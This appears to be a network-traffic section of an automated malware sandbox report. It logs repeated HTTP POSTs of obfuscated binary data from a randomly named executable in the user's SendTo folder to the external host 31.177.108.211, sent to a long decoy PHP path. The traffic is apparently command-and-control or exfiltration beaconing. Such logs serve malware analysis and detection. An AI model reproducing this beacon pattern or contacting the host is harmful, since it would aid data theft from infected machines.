                                          Data Raw: 39 38 0d 0a 0d 1e 39 54 3c 18 33 57 24 05 01 18 38 3d 36 52 33 2f 38 59 3c 23 25 43 28 5b 3c 5a 2d 04 00 58 24 3b 08 01 30 05 20 03 24 2c 3b 14 2b 3a 2e 46 0d 1d 25 59 2a 01 20 55 3e 07 28 5c 26 2e 35 17 22 30 38 03 24 59 20 0c 21 3c 2d 05 34 32 3b 55 25 03 29 5c 2d 26 21 06 29 57 26 13 37 0c 2e 55 0f 15 3a 0e 31 31 3a 56 3f 31 27 12 28 3f 3e 1d 26 3c 20 08 25 38 2b 0f 27 5e 25 0d 25 2c 35 12 32 21 20 03 2a 2e 39 10 20 31 21 0f 22 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989T<3W$8=6R3/8Y<#%C([<Z-X$;0 $,;+:.F%Y* U>(\&.5"08$Y !<-42;U%)\-&!)W&7.U:11:V?1'(?>&< %8+'^%%,52! *.9 1!"+'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          62 | 192.168.2.4 | 56731 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:30.650429964 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:31.034506083 CEST | 2532 | OUT | Data Raw: 5e 51 43 57 50 46 59 5d 59 5f 51 51 52 58 54 54 5a 5e 5a 5a 55 5e 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QCWPFY]Y_QQRXTTZ^ZZU^SGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<?1!224\(86R+Y=>;$(?&33&,%_&;9[&!^-'
                                          Sep 13, 2024 21:03:31.432576895 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:31.586093903 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          63 | 192.168.2.4 | 56732 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:31.719697952 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:32.066732883 CEST | 2532 | OUT | Data Raw: 5b 54 46 51 50 41 59 55 59 5f 51 51 52 5f 54 54 5a 58 5a 5e 55 52 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFQPAYUY_QQR_TTZXZ^URSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*,)45"#9\=+2R(<5*W<<)'U0U%)$$?;1;9[&!^-;
                                          Sep 13, 2024 21:03:32.875997066 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:32.876848936 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:32.877429962 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          64 | 192.168.2.4 | 56733 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:33.007421017 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:33.363689899 CEST | 2532 | OUT | Data Raw: 5b 51 43 57 50 41 59 54 59 5f 51 51 52 5f 54 52 5a 59 5a 59 55 57 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCWPAYTY_QQR_TRZYZYUWSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+54#U!=+:(,)Y)+?(9'U1<219[&!^-;
                                          Sep 13, 2024 21:03:33.741781950 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:34.095482111 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:34.102199078 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          65 | 192.168.2.4 | 56734 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:34.232089996 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:34.582375050 CEST | 2532 | OUT | Data Raw: 5b 54 46 56 55 41 59 57 59 5f 51 51 52 5a 54 54 5a 5e 5a 59 55 50 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFVUAYWY_QQRZTTZ^ZYUPSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?Y4"" !=5(:)<T?%0 1*,1,#&;9[&!^-/
                                          Sep 13, 2024 21:03:35.003562927 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:35.160618067 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          66 | 192.168.2.4 | 56735 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:35.292803049 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:35.644825935 CEST | 2532 | OUT | Data Raw: 5b 52 43 54 55 46 5c 50 59 5f 51 51 52 5c 54 55 5a 5b 5a 5c 55 57 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCTUF\PY_QQR\TUZ[Z\UWS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(!1& U9*(-<?Z)(T<,*\'U#1 &< 19[&!^-7
                                          Sep 13, 2024 21:03:36.075279951 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:36.205056906 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          67 | 192.168.2.4 | 56737 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:37.442460060 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:37.801480055 CEST | 2532 | OUT | Data Raw: 5b 52 43 50 55 42 59 5d 59 5f 51 51 52 5f 54 56 5a 52 5a 59 55 5f 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCPUBY]Y_QQR_TVZRZYU_SCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*<5 "6 05);!(<*=;;<)304&)7A1'2;9[&!^-;
                                          Sep 13, 2024 21:03:38.189130068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:38.347382069 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:38 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          68 | 192.168.2.4 | 56738 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:38.481354952 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:38.832535982 CEST | 2532 | OUT | Data Raw: 5b 52 46 54 55 45 5c 50 59 5f 51 51 52 5c 54 51 5a 5c 5a 5f 55 54 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RFTUE\PY_QQR\TQZ\Z_UTSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*/) "_73)()+Y)$W<.\0 ,%*'%<<Z19[&!^-7
                                          Sep 13, 2024 21:03:39.255346060 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:39.416332006 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          69 | 192.168.2.4 | 56739 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:39.564448118 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:39.910486937 CEST | 2532 | OUT | Data Raw: 5e 55 43 50 50 43 5c 55 59 5f 51 51 52 51 54 51 5a 5c 5a 5a 55 52 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCPPC\UY_QQRQTQZ\ZZURSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+*] !##:*+5?9++<P+<-'321 X&9[&!^-
                                          Sep 13, 2024 21:03:40.328269958 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:40.464576006 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          70 | 192.168.2.4 | 56740 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:40.590359926 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:40.941943884 CEST | 2528 | OUT | Data Raw: 5b 5f 46 55 50 47 59 56 59 5f 51 51 52 59 54 5b 5a 53 5a 5d 55 52 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_FUPGYVY_QQRYT[ZSZ]URSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B(Y-#!Y7=8.(/>(<W<&Z%3<V%:#E&<'29[&!^-
                                          Sep 13, 2024 21:03:41.376859903 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:41.504622936 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          71 | 192.168.2.4 | 56741 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:42.440761089 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:42.785664082 CEST | 2108 | OUT | Data Raw: 5b 50 43 52 55 42 5c 56 59 5f 51 51 52 51 54 55 5a 5a 5a 5d 55 56 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCRUB\VY_QQRQTUZZZ]UVSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C?/:]!!9X 3)].S+?*;?<?>]%33%'C&(%9[&!^-
                                          Sep 13, 2024 21:03:43.176472902 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:43.330107927 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          72 | 192.168.2.4 | 56742 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:42.444489002 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:43.174441099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:43.327456951 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          73 | 192.168.2.4 | 56743 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:03:43.490695953 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:44.278430939 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:44.433160067 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
